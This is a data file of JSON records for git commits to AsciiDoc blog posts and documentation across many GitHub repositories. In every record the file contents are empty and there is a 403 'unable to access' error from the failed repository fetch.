{"commit":"dba6d5838bb8a848ca5f59133c36d4623c23c705","subject":"Update 2015-01-21-Ex-Machina.adoc","message":"Update 2015-01-21-Ex-Machina.adoc","repos":"heartnn\/hubpress.io,heartnn\/hubpress.io,heartnn\/hubpress.io,heartnn\/hubpress.io","old_file":"_posts\/2015-01-21-Ex-Machina.adoc","new_file":"_posts\/2015-01-21-Ex-Machina.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heartnn\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"56d220934dfe1bb85c30e160e3735abc1d2a8122","subject":"Update 2015-05-12-First-Post.adoc","message":"Update 2015-05-12-First-Post.adoc","repos":"mubix\/blog.room362.com,mubix\/blog.room362.com,mubix\/blog.room362.com","old_file":"_posts\/2015-05-12-First-Post.adoc","new_file":"_posts\/2015-05-12-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mubix\/blog.room362.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"edd93ac4bdae855f9d816fef4882c9c9c9758401","subject":"Update 2016-10-12-First-post.adoc","message":"Update 2016-10-12-First-post.adoc","repos":"cloudmind7\/cloudmind7.github.com,cloudmind7\/cloudmind7.github.com,cloudmind7\/cloudmind7.github.com,cloudmind7\/cloudmind7.github.com,cloudmind7\/cloudmind7.github.com","old_file":"_posts\/2016-10-12-First-post.adoc","new_file":"_posts\/2016-10-12-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cloudmind7\/cloudmind7.github.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"e9461cb2a86d810219a5d42264ece5a28b41a1c7","subject":"Update 2015-09-29-That-was-my-jam.adoc","message":"Update 2015-09-29-That-was-my-jam.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"406d0fbbc0711a28c2cd52fc9cf7ec860ff8d011","subject":"create post The Worst Text You Could Ever Receive...","message":"create post The Worst Text You Could Ever Receive...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-The-Worst-Text-You-Could-Ever-Receive....adoc","new_file":"_posts\/2018-02-26-The-Worst-Text-You-Could-Ever-Receive....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"5c74da09d264324b83678ebde3a71489d4bb4452","subject":"Update installation-guide-amazon-introduction.adoc","message":"Update installation-guide-amazon-introduction.adoc\n\nfixing typo","repos":"gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs","old_file":"pages\/apim\/3.x\/installation-guide\/amazon-linux\/installation-guide-amazon-introduction.adoc","new_file":"pages\/apim\/3.x\/installation-guide\/amazon-linux\/installation-guide-amazon-introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"77b822a4209e8c86b2f2a80f09331fa8bc4d1168","subject":"Changing demo gif.","message":"Changing demo gif.\n","repos":"brechin\/hypatia,Applemann\/hypatia,Applemann\/hypatia,lillian-lemmer\/hypatia,lillian-lemmer\/hypatia,hypatia-software-org\/hypatia-engine,brechin\/hypatia,hypatia-software-org\/hypatia-engine","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Applemann\/hypatia.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"e011ade27e7db48f159908180cbd34c469a915d5","subject":"Update 2016-03-29-Python.adoc","message":"Update 2016-03-29-Python.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Python.adoc","new_file":"_posts\/2016-03-29-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"f12a1fe22bafc78e335c385208f60ecd9cabdf68","subject":" minor fix","message":" minor fix\n","repos":"dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core","old_file":"trex_book.asciidoc","new_file":"trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"fa4dadf8190ed40adfa94b8328e5a8614a27ee49","subject":"Update 2016-03-11-Should-you-bother-visiting-Disneys-Hollywood-Studios-on-your-next-trip.adoc","message":"Update 2016-03-11-Should-you-bother-visiting-Disneys-Hollywood-Studios-on-your-next-trip.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-11-Should-you-bother-visiting-Disneys-Hollywood-Studios-on-your-next-trip.adoc","new_file":"_posts\/2016-03-11-Should-you-bother-visiting-Disneys-Hollywood-Studios-on-your-next-trip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"be544d4b9b149001ddb7c73f9502d7456e350376","subject":"Create testing-interfaces.adoc","message":"Create testing-interfaces.adoc","repos":"sobkowiak\/smx-order-service-demo","old_file":"doc\/testing-interfaces.adoc","new_file":"doc\/testing-interfaces.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sobkowiak\/smx-order-service-demo.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"1beb06f59e8a39f6fc448c10a3304e2a856bbad3","subject":"Update 2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","message":"Update 2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","new_file":"_posts\/2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"c4e9fc62892ad02ef78452d07d6afcb604a838f6","subject":"Update 2015-07-02-Die-Wolken.adoc","message":"Update 2015-07-02-Die-Wolken.adoc","repos":"havvazaman\/havvazaman.github.io,havvazaman\/havvazaman.github.io,havvazaman\/havvazaman.github.io","old_file":"_posts\/2015-07-02-Die-Wolken.adoc","new_file":"_posts\/2015-07-02-Die-Wolken.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/havvazaman\/havvazaman.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"ecdbf9852c6f544bcb28724e202de41b7441b3bb","subject":"change documentation","message":"change documentation\n","repos":"fvasquezjatar\/fermat-unused,fvasquezjatar\/fermat-unused","old_file":"fermat-documentation\/technical notes\/Bitcoin configuration\/Local bitcoin environment.asciidoc","new_file":"fermat-documentation\/technical notes\/Bitcoin configuration\/Local bitcoin environment.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fvasquezjatar\/fermat-unused.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"620475c131271321057ed257de84705f8f77128d","subject":"Update 2016-07-25-2016-07-24.adoc","message":"Update 2016-07-25-2016-07-24.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-07-25-2016-07-24.adoc","new_file":"_posts\/2016-07-25-2016-07-24.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"0abcd627e81b17fb80102448912e06413f04a027","subject":"Update 2016-09-12-Why-I-left.adoc","message":"Update 2016-09-12-Why-I-left.adoc","repos":"endymion64\/VinJBlog,endymion64\/VinJBlog,endymion64\/endymion64.github.io,endymion64\/endymion64.github.io,endymion64\/VinJBlog,endymion64\/endymion64.github.io,endymion64\/VinJBlog,endymion64\/endymion64.github.io","old_file":"_posts\/2016-09-12-Why-I-left.adoc","new_file":"_posts\/2016-09-12-Why-I-left.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endymion64\/endymion64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"745a4f1ae209b0f729814db0e4150c74265a7404","subject":"Update 2016-05-16-blabla-1-2-.adoc","message":"Update 2016-05-16-blabla-1-2-.adoc","repos":"sgalles\/sgalles.github.io,sgalles\/sgalles.github.io,sgalles\/sgalles.github.io,sgalles\/sgalles.github.io","old_file":"_posts\/2016-05-16-blabla-1-2-.adoc","new_file":"_posts\/2016-05-16-blabla-1-2-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sgalles\/sgalles.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"57a5aad74bcd5b40b21208dd3e55841e7208c2ac","subject":"Update 2018-06-01-Hello-world.adoc","message":"Update 2018-06-01-Hello-world.adoc","repos":"nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io","old_file":"_posts\/2018-06-01-Hello-world.adoc","new_file":"_posts\/2018-06-01-Hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nbourdin\/nbourdin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"cc3d89a49707f59d2bc65d7dd5befbf69117597b","subject":"Deleted _posts\/2016-06-25-Should-advanced-object-destructuring-patterns-be-avoided-due-to-readability-issues.adoc","message":"Deleted _posts\/2016-06-25-Should-advanced-object-destructuring-patterns-be-avoided-due-to-readability-issues.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2016-06-25-Should-advanced-object-destructuring-patterns-be-avoided-due-to-readability-issues.adoc","new_file":"_posts\/2016-06-25-Should-advanced-object-destructuring-patterns-be-avoided-due-to-readability-issues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"2a36c4d4b6afd96d47db74deb538a695a31c92a2","subject":"Update README with mentions of support for JUnit Attachments and Flaky Test Handler","message":"Update README with mentions of support for JUnit Attachments and Flaky Test Handler\n","repos":"jenkinsci\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin,jenkinsci\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenkinsci\/pipeline-maven-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"85cee3766153e77220d62605562d2dee3d4954a7","subject":"Remove extended sample from the doc","message":"Remove extended sample from the doc","repos":"corbtastik\/spring-cloud-stream-samples,corbtastik\/spring-cloud-stream-samples","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/corbtastik\/spring-cloud-stream-samples.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"7cb990a29fd40c7accedeaa94ada720842954a9a","subject":"KUDU-1198 Expand upon Cloudera Manager version recommendations","message":"KUDU-1198 Expand upon Cloudera Manager version recommendations\n\nChange-Id: I0e1efb45565aa245d95bc26d4cd7fb89d30ee3ac\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1073\nReviewed-by: Ana Krasteva\nTested-by: Ana Krasteva\n","repos":"andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"4f0dc5bf3271119b0fe65579b1192034fa92e875","subject":"Mark filtered query example as not to be used (#25661)","message":"Mark filtered query example as not to be used (#25661)\n\nThe Filtered Query has been deprecated in favour of the Bool Query with a filter context. However, this deleted page for the Filtered Query is often ranked highly in search results when searching for documentation on \"filtered queries\". Often people just copy the first code snippet they see, which in this case is the INCORRECT syntax (the correct syntax follows). I think reordering the examples would help avoid a lot of confusion (I have seen people make this same mistake 3 times now)\r\n\r\nAdding a comment to indicate that the first example shouldn't be used","repos":"robin13\/elasticsearch,gingerwizard\/elasticsearch,rajanm\/elasticsearch,pozhidaevak\/elasticsearch,wangtuo\/elasticsearch,wenpos\/elasticsearch,sneivandt\/elasticsearch,qwerty4030\/elasticsearch,nknize\/elasticsearch,scottsom\/elasticsearch,maddin2016\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,mjason3\/elasticsearch,scorpionvicky\/elasticsearch,kalimatas\/elasticsearch,Stacey-Gammon\/elasticsearch,wenpos\/elasticsearch,qwerty4030\/elasticsearch,scorpionvicky\/elasticsearch,mjason3\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,masaruh\/elasticsearch,lks21c\/elasticsearch,maddin2016\/elasticsearch,markwalkom\/elasticsearch,shreejay\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,shreejay\/elasticsearch,wenpos\/elasticsearch,uschindler\/elasticsearch,fred84\/elasticsearch,qwerty4030\/elasticsearch,kalimatas\/elasticsearch,sneivandt\/elasticsearch,nknize\/elasticsearch,vroyer\/elasticassandra,scottsom\/elasticsearch,fred84\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,mohit\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,rajanm\/elasticsearch,vroyer\/elasticassandra,Stacey-Gammon\/elasticsearch,mohit\/elasticsearch,lks21c\/elasticsearch,strapdata\/elassandra,rajanm\/elasticsearch,scorpionvicky\/elasticsearch,brandonkearby\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,mjason3\/elasticsearch,mjason3\/elasticsearch,masaruh\/elasticsearch,jimczi\/elasticsearch,jimczi\/elasticsearch,jimczi\/elasticsearch,gingerwizard\/elasticsearch,s1monw\/elasticsearch,gingerwizard\/elasticsearch,s1monw\/elasticsearch,HonzaKral\/elasticsearch,Stacey-Gammon\/elasticsearch,maddin2016\/elasticsearch,brandonkearby\/elasticsearch,mohit\/elasticsearch,markwalkom\/elasticsearch,markwalkom\/elasticsearch,strapdata\/elassandra,vroyer\/elassandra,shreejay\/elasticsearch,fred84\/elasticsearch,scorpionvicky\/elasticsearch,masaruh\/elasticsearch,pozhidaevak\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,pozhidaevak\/elasticsearch,strapdata\/elassandra,strapdata\/elassandra,masaruh\/elasticsearch,s1monw\/elasticsearch,mohit\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,sneivandt\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,kalimatas\/elasticsearch,masaruh\/elasticsearch,lks21c\/elasticsearch,lks21c\/elasticsearch,lks21c\/elasticsearch,gingerwizard\/elasticsearch,shreejay\/elasticsearch,robin13\/elasticsearch,brandonkearby\/elasticsearch,pozhidaevak\/elasticsearch,coding0011\/elasticsearch,wangtuo\/elasticsearch,rajanm\/elasticsearch,scottsom\/elasticsearch,gfyoung\/elasticsearch,fred84\/elasticsearch,HonzaKral\/elasticsearch,markwalkom\/elasticsearch,umeshdangat\/elasticsearch,GlenRSmith\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,vroyer\/elassandra,kalimatas\/elasticsearch,vroyer\/elasticassandra,umeshdangat\/elasticsearch,GlenRSmith\/elasticsearch,shreejay\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,maddin2016\/elasticsearch,GlenRSmith\/elasticsearch,brandonkearby\/elasticsearch,scottsom\/elasticsearch,umeshdangat\/elasticsearch,uschindler\/elasticsearch,scottsom\/elasticsearch,Stacey-Gammon\/elasticsearch,jimczi\/elasticsearch,pozhidaevak\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gfyoung\/elasticsearch,markwalkom\/elasticsearch","old_file":"docs\/reference\/redirects.asciidoc","new_file":"docs\/reference\/redirects.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"649920f905f22089547d74327d9f23668c74818a","subject":"Update 2018-10-15-Docker-N-E-M-A-P-I-Account.adoc","message":"Update 2018-10-15-Docker-N-E-M-A-P-I-Account.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-15-Docker-N-E-M-A-P-I-Account.adoc","new_file":"_posts\/2018-10-15-Docker-N-E-M-A-P-I-Account.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"f52e9003c3371d6671824be0dc35752fb3e94041","subject":"Update 2017-08-15-IDE-Faster-IDE.adoc","message":"Update 2017-08-15-IDE-Faster-IDE.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-08-15-IDE-Faster-IDE.adoc","new_file":"_posts\/2017-08-15-IDE-Faster-IDE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"d29cb5f24ef24d378def7f1abf71d2e107393acb","subject":"Update 2015-07-31-Introduction.adoc","message":"Update 2015-07-31-Introduction.adoc","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"_posts\/2015-07-31-Introduction.adoc","new_file":"_posts\/2015-07-31-Introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fastretailing\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"31faa2c17d08bb0595b6a6b773e1530b83e1d1b6","subject":"2016-07-06-quadruplexes.adoc","message":"2016-07-06-quadruplexes.adoc\n","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-07-06-quadruplexes.adoc","new_file":"_posts\/2016-07-06-quadruplexes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"e08446c395113669b6733a873e34bb6915384d3a","subject":"Update 2016-08-25-Tmux-Kung-fu.adoc","message":"Update 2016-08-25-Tmux-Kung-fu.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"0bcc00248cdab68764c34cd73d0662d0368d558e","subject":"Update 2016-12-20-Blog-Title.adoc","message":"Update 2016-12-20-Blog-Title.adoc","repos":"sxgc\/blog,sxgc\/blog,sxgc\/blog,sxgc\/blog","old_file":"_posts\/2016-12-20-Blog-Title.adoc","new_file":"_posts\/2016-12-20-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sxgc\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"c63ebe03269c238535db9905d8c615b08578a101","subject":"Update 2017-01-14-First-post.adoc","message":"Update 2017-01-14-First-post.adoc","repos":"akoskovacsblog\/akoskovacsblog.github.io,akoskovacsblog\/akoskovacsblog.github.io,akoskovacsblog\/akoskovacsblog.github.io,akoskovacsblog\/akoskovacsblog.github.io","old_file":"_posts\/2017-01-14-First-post.adoc","new_file":"_posts\/2017-01-14-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/akoskovacsblog\/akoskovacsblog.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"0c1ef3d8d09cc93cfdbcf70aaa8eac0565dcf253","subject":"Update 2017-02-01-A-Light-Poem.adoc","message":"Update 2017-02-01-A-Light-Poem.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-02-01-A-Light-Poem.adoc","new_file":"_posts\/2017-02-01-A-Light-Poem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"0029001c7f7c37632f8c41a6435c930b6ad2daa8","subject":"Update 2014-12-01-Inventing-a-Thing.adoc","message":"Update 2014-12-01-Inventing-a-Thing.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-12-01-Inventing-a-Thing.adoc","new_file":"_posts\/2014-12-01-Inventing-a-Thing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"0f2016046f624cd1a3b88f6aaefbc8d953f7ca28","subject":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","message":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"4489fbd3170c09c8c39e487fc04925562a23c16e","subject":"Update 2015-08-14-That-flag.adoc","message":"Update 2015-08-14-That-flag.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2015-08-14-That-flag.adoc","new_file":"_posts\/2015-08-14-That-flag.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"246274311a40a9b6c3406435ac0c0fd37c93a580","subject":"Adding a new blog entry","message":"Adding a new blog entry\n","repos":"rhusar\/wildfly.org,luck3y\/wildfly.org,stuartwdouglas\/wildfly.org,luck3y\/wildfly.org,ctomc\/wildfly.org,ctomc\/wildfly.org,luck3y\/wildfly.org,rhusar\/wildfly.org,stuartwdouglas\/wildfly.org,adrianoschmidt\/wildfly.org,adrianoschmidt\/wildfly.org,stuartwdouglas\/wildfly.org,rhusar\/wildfly.org,ctomc\/wildfly.org,adrianoschmidt\/wildfly.org","old_file":"news\/2014-04-25-Getting-Started-WildFly-OpenShift.adoc","new_file":"news\/2014-04-25-Getting-Started-WildFly-OpenShift.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rhusar\/wildfly.org.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"35bd414354aa8a043c4414a8acccb70674ea8f39","subject":"Added kata5 guide","message":"Added kata5 guide\n","repos":"Accordance\/microservice-dojo,Accordance\/microservice-dojo,Accordance\/microservice-dojo,Accordance\/microservice-dojo","old_file":"guides\/src\/kata5\/service_using_mongo_db.adoc","new_file":"guides\/src\/kata5\/service_using_mongo_db.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Accordance\/microservice-dojo.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"148e2c1aed98318c2d082a8dad6c41491f1675d6","subject":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","message":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"70c2d983283791929aacd02c38a4fd7b11301b0f","subject":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","message":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"7c10350f588db9dd6e69346fa1cc73e271b9ee2a","subject":"The task for the 4th lab","message":"The task for the 4th lab\n","repos":"slbedu\/javase8-2016","old_file":"lab04\/README.adoc","new_file":"lab04\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/slbedu\/javase8-2016.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
